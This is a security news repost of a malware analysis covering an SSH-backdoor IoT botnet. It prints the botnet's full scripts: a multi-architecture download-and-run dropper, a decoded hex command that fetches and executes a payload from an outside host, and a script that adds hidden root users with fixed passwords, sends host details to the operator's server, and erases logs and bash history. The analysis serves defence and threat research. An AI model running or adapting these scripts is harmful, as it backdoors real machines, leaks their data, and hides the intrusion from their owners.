SSH-backdoor Botnet With ‘Research’ Infection Technique

Security expert Tolijan Trajanovski analyzed an SSH-backdoor Botnet that implements an interesting ‘Research’ infection technique.

In a recent tweet, the malware researcher @0xrb shared a list containing URLs of recently captured IoT botnet samples. Among the links, there was an uncommon example, a URL behind a Discord CDN, which as pointed by the IoT malware researcher @_lubiedo, may be difficult to block.

Summary: The malware author claims to be doing these infections for ‘research purposes’, or in his words to test which servers would stay active with infection unnoticed for the longest period (by infection we refer to adding users for remote ssh access). The ‘no harm research purposes’ claim is backed by making the final stage of the infection a shell-script rather than a compiled binary which would require more time to reverse engineer. Also, stage 1 binary payload is not obfuscated/packed. This botnet malware backdoors Linux devices with SSH access by adding users.

Interesting bits:network IDS / blacklist evasion -> Discord CDN for binary distribution over HTTPS rather than VPS boxes (the typical way)Anti-sandbox and EDR / Antivirus evasion -> Use of timeouts, removes logs and bash history, echoed hex-strings as intermediate payload

Stage 1:

The infection starts with fetching a shell-script from the URL below and executing it:hxxps://cdn.discordapp.com/attachments/779820448182960152/780735645169352765/ugyuftyufydurdiytyabins.sh

!/bin/bash

cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget https://cdn.discordapp.com/attachments/780731895721492502/780732479996428288/mips; chmod +x mips; ./mips; rm -rf mipscd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget https://cdn.discordapp.com/attachments/780731895721492502/780732483510599700/mipsel; chmod +x mipsel; ./mipsel; rm -rf mipselcd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget https://cdn.discordapp.com/attachments/780731895721492502/780732432163799040/sh4; chmod +x sh4; ./sh4; rm -rf sh4cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget https://cdn.discordapp.com/attachments/780731895721492502/780732439554687006/x86; chmod +x x86; ./x86; rm -rf x86cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget https://cdn.discordapp.com/attachments/780731895721492502/780732462300659732/armv6l; chmod +x armv6l; ./armv6l; rm -rf armv6lcd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget https://cdn.discordapp.com/attachments/780731895721492502/780732470899376128/i686; chmod +x i686; ./i686; rm -rf i686cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget https://cdn.discordapp.com/attachments/780731895721492502/780732420395237416/powerpc; chmod +x powerpc; ./powerpc; rm -rf powerpccd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget https://cdn.discordapp.com/attachments/780731895721492502/780732465059987476/i586; chmod +x i586; ./i586; rm -rf i586cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget https://cdn.discordapp.com/attachments/780731895721492502/780732474173947934/m68k; chmod +x m68k; ./m68k; rm -rf m68kcd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget https://cdn.discordapp.com/attachments/780731895721492502/780732437822046228/sparc; chmod +x sparc; ./sparc; rm -rf sparccd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget https://cdn.discordapp.com/attachments/780731895721492502/780732445711663124/armv4l; chmod +x armv4l; ./armv4l; rm -rf armv4lcd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget https://cdn.discordapp.com/attachments/780731895721492502/780732453115527208/armv5l; chmod +x armv5l; ./armv5l; rm -rf armv5l

When it comes to IoT/Linux botnets, the shell-scripts are typically used for downloading and executing cross-compiled binaries of the botnet. In this analysis, we’ll look at the binary sample compiled for Intel x86 CPU.

URL: htxxps://cdn.discordapp.com/attachments/780731895721492502/780732439554687006/x86Binary name:x86SHA256: 3a09d7ff4e492c9df2ddd9f547d0307d8e57dabebfb0bb8673c0c078deda6232Virustotal: https://www.virustotal.com/gui/file/3a09d7ff4e492c9df2ddd9f547d0307d8e57dabebfb0bb8673c0c078deda6232/detectionThe x86 sample is detected by 42/62 AV engines. This is not strange since the sample is not obfuscated using packers or string encoding. 

Stage 2:

The x86 sample (stage 1) makes an HTTP GET request to a URL: hxxp://45.11.181.37/…/vividThe web server responds as follows:

(echo -en “x28x77x68x69x6cx65x20x74x72x75x65x3bx64x6fx20x28x73x6cx65x65x70x20x24x28x28x20x52x41x4ex44x4fx4dx20x25x20x32x30x30x20x29x29x3bx28x70x72x69x6ex74x66x20x22x28x77x67x65x74x20x2dx71x20x22x68x74x74x70x3ax2fx2fx67x61x79x2ex65x6ex65x72x67x79x2fx2ex2ex2ex2fx6fx73x22x20x2dx4fx20x2ex2ex2ex2ex20x3bx63x68x6dx6fx64x20x37x37x37x20x2ex2ex2ex2ex20x3bx2ex2fx2ex2ex2ex2ex20x3bx20x72x6dx20x2dx72x66x20x2ex2ex2ex2ex20x3bx63x6cx65x61x72x3bx63x6cx65x61x72x3bx68x69x73x74x6fx72x79x20x2dx63x29x20x3ex20x2fx64x65x76x2fx6ex75x6cx6cx20x32x3ex26x31x22x7cx62x61x73x68x29x20x26x20x3ex20x2fx64x65x76x2fx6ex75x6cx6cx20x32x3ex26x31x29x20x26x20x73x6cx65x65x70x20x34x33x32x30x30x3bx64x6fx6ex65x20x26x20x64x69x73x6fx77x6ex20x26x29x3ex20x2fx64x65x76x2fx6ex75x6cx6cx20x32x3ex26x31x20x26x20x63x6cx65x61x72x3bx63x6cx65x61x72x3bx68x69x73x74x6fx72x79x20x2dx63″|bash) > /dev/null 2>&1

The sequence of bytes is piped to bash directly and not written to a file on the machine, as it is typically done with the echoed hex strings payload transfer technique, originally introduced by Hajime. The hex string resolves to the following sequence of shell commands:

(while true;do (sleep $(( RANDOM % 200 ));(printf “(wget -q “http://gay.energy/…/os” -O …. ;chmod 777 …. ;./…. ; rm -rf …. ;clear;clear;history -c) > /dev/null 2>&1″|bash) & > /dev/null 2>&1) & sleep 43200;done & disown &)> /dev/null 2>&1 & clear;clear;history -c

The sequence of commands fetched from the web server instructs the victim device to perform the following:

Wait some time -> possible evasive behaviour against EDR/Antivirus and sandbox analysisDownloads the Stage 3 Payload hxxp://gay.energy/…/osClears bash history Stage 3:

The stage 3 payload, os, is also a shell-script, it performs the following actions:

Adds usersMakes a request to a PHP server that registers the newly infected/backdoored devices. The registration request contains the port of the SSH server on the victim device , the OS name, number of CPUs and RAM+SWAP memory available on the device.Removes logs and bash history!/bin/bash

Congrats You Found Me, I felt it was wrong to make this in C and not let any of you have a chance to remove it since its only

An Added Super User and can simply be removed, or password changed.
Hit Up My Discord: CodeAbuse#1263

For Info to remove it or simply how.
BTW: I do not infect the servers or do anything with them, tbh i just watch cause im bored. 99% of them would ban with one dos attack.
Im simply watching to see which hosts last the longest for basic nets so ik there is a higher chance of my new project
surviving on them the longest. Call it research purposes.
Only doing this cause i dont really speak to a lot of ppl or watch that much any more so it just keeps me in the loop a bit.
KillMe=”$(echo -e “${0}”|tr -d ‘./’)”
function LogyLog(){
if [ -f /usr/bin/yum ]; then
wget -qO- “http://gay.energy/WelcomeNewBotBuddy/OwO.php?HOLETOFUCK=$(grep -Ew “#Port|Port” /etc/ssh/sshd_config|awk ‘{print $2}’|head -n1)&OSCHECKNIGNOG=CENTYBITCH&RUNNINGOS=$(cat /etc/system-release|head -n1)&TOTALCPU=$(nproc –all|head -n1)&TOTALRAM=$(free -mt|grep “Total:”|awk ‘{print $2}’|head -n1)&HOWTFELSEDOIGETIN=PwzLetMeInYourServerSoWeCanFuckSenpaiCodeAbuse” > /dev/null
curl -s “http://gay.energy/WelcomeNewBotBuddy/OwO.php?HOLETOFUCK=$(grep -Ew “#Port|Port” /etc/ssh/sshd_config|awk ‘{print $2}’|head -n1)&OSCHECKNIGNOG=CENTYBITCH&RUNNINGOS=$(cat /etc/system-release|head -n1)&TOTALCPU=$(nproc –all|head -n1)&TOTALRAM=$(free -mt|grep “Total:”|awk ‘{print $2}’|head -n1)&HOWTFELSEDOIGETIN=PwzLetMeInYourServerSoWeCanFuckSenpaiCodeAbuse” > /dev/null
clear;clear;rm -rf .bash_history;rm -rf /root/.bash_history;history -c
elif [ -f /usr/bin/apt-get ]; then
wget -qO- “http://gay.energy/WelcomeNewBotBuddy/OwO.php?HOLETOFUCK=$(grep -Ew “#Port|Port” /etc/ssh/sshd_config|awk ‘{print $2}’|head -n1)&OSCHECKNIGNOG=DUBIUNTUBITCH&RUNNINGOS=$(lsb_release -d|awk ‘{$1= “”; print $0}’|head -n1)&TOTALCPU=$(nproc –all|head -n1)&TOTALRAM=$(free -mt|grep “Total:”|awk ‘{print $2}’)&HOWTFELSEDOIGETIN=PwzLetMeInYourServerSoWeCanFuckSenpaiCodeAbuse” > /dev/null
curl -s “http://gay.energy/WelcomeNewBotBuddy/OwO.php?HOLETOFUCK=$(grep -Ew “#Port|Port” /etc/ssh/sshd_config|awk ‘{print $2}’|head -n1)&OSCHECKNIGNOG=DUBIUNTUBITCH&RUNNINGOS=$(lsb_release -d|awk ‘{$1= “”; print $0}’|head -n1)&TOTALCPU=$(nproc –all|head -n1)&TOTALRAM=$(free -mt|grep “Total:”|awk ‘{print $2}’)&HOWTFELSEDOIGETIN=PwzLetMeInYourServerSoWeCanFuckSenpaiCodeAbuse” > /dev/null
clear;clear;rm -rf .bash_history;rm -rf /root/.bash_history;history -c
fi
}
Very Simple To Do Yet Not Noticed That Much?

(useradd -o -u 0 -g 0 -M -d /root -s /bin/bash system; echo -e “G2PHFW3yUkTvdZ86v2ajnG2PHFW3yUkTvdZ86v2aj” | passwd system;LogyLog; rm -rf /var/log/lastlog;clear;clear;history -c)> /dev/null 2>&1 & clear;clear;history -c(useradd -o -u 0 -g 0 -M -d /root -s /bin/bash os; echo -e “s2FF4rHxDJuKwj8V5wCgns2FF4rHxDJuKwj8V5wCg” | passwd os;LogyLog; rm -rf /var/log/lastlog;clear;clear;history -c)> /dev/null 2>&1 & clear;clear;history -c(useradd -o -u 0 -g 0 -M -d /root -s /bin/bash passwd; echo -e “fwZ4HmvXWC5m7V4EyzQ5nfwZ4HmvXWC5m7V4EyzQ5” | passwd passwd;LogyLog; rm -rf /var/log/lastlog;clear;clear;history -c)> /dev/null 2>&1 & clear;clear;history -c(useradd -o -u 0 -g 0 -M -d /root -s /bin/bash bash; echo -e “AhdaVjd9TfzBFGW84pYwnAhdaVjd9TfzBFGW84pYw” | passwd bash;LogyLog; rm -rf /var/log/lastlog;clear;clear;history -c)> /dev/null 2>&1 & clear;clear;history -c(useradd -o -u 0 -g 0 -M -d /root -s /bin/bash shell; echo -e “U3YznCMKqNXhVcYLMyX2nU3YznCMKqNXhVcYLMyX2” | passwd shell;LogyLog; rm -rf /var/log/lastlog;clear;clear;history -c)> /dev/null 2>&1 & clear;clear;history -cjobs;clear;clear;rm -rf .bash_history;rm -rf /root/.bash_history;history -c;exitrm -rf ${KillMe}rm -rf .bash_history;rm -rf /root/.bash_historyhistory -cexit

PHP server that handles registration of new infected devices: hxxp://gay.energy/WelcomeNewBotBuddy/OwO.php

Original analysis @ https://tolisec.com/ssh-backdoor-botnet-with-research-infection-technique/

About the author: Tolijan Trajanovski (@tolisec)

Tolijan Trajanovski is a Cyber Security Researcher and a PhD Candidate at the University of Manchester, UK, specializing in IoT Security and Malware Analysis.

try {
window._mNHandle.queue.push(function (){
window._mNDetails.loadTag(“816788371”, “300×250”, “816788371”);
});
}
catch (error) {}

try {
window._mNHandle.queue.push(function (){
window._mNDetails.loadTag(“816788371”, “300×250”, “816788371”);
});
}
catch (error) {}
Pierluigi Paganini

(SecurityAffairs – hacking, botnet)

The post SSH-backdoor Botnet With ‘Research’ Infection Technique appeared first on Security Affairs.